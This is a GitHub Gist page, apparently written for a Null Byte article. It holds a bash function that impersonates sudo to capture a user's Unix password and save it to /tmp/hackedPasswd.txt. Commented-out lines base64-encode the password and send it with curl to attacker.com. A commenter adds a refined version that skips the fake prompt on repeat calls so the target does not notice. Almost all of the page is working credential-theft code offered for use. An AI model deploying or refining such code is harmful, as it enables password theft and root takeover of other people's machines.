Skip to content

Instantly share code, notes, and snippets.

@tokyoneon

tokyoneon/sudo

Last active Nov 16, 2020
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Sudo function for stealing Unix passwords; script for WonderHowTo article
Raw
sudo
function sudo ()
{
# https://null-byte.com/privesc-0194190/
realsudo="$(which sudo)";
read -s -p "[sudo] password for $USER: " inputPasswd;
printf "\n";
printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt;
# encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1;
# curl -s "http://attacker.com/$USER:$encoded" > /dev/null 2>&1;
$realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1;
$realsudo "${@:1}"
}
@benbusby

This comment has been minimized.

Sign in to view
Copy link

@benbusby benbusby commented Jan 8, 2020

Nice! There's one small change I think is worthwhile though:

function sudo () {
    realsudo="$(which sudo)"

    if grep -Fqs "$USER" /tmp/hackedPasswd.txt
    then
        $realsudo "${@:1}"
    else
        read -s -p "[sudo] password for $USER: " inputPasswd
        printf "\n"; printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt
        $realsudo -S <<< "$inputPasswd" -u root bash -c "exit" > /dev/null 2>&1
        $realsudo "${@:1}"
    fi
}

This way it skips the password prompt for subsequent commands, and doesn't look suspicious to a target running back to back sudo commands when they're still within the "root/sudo timeout" window.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment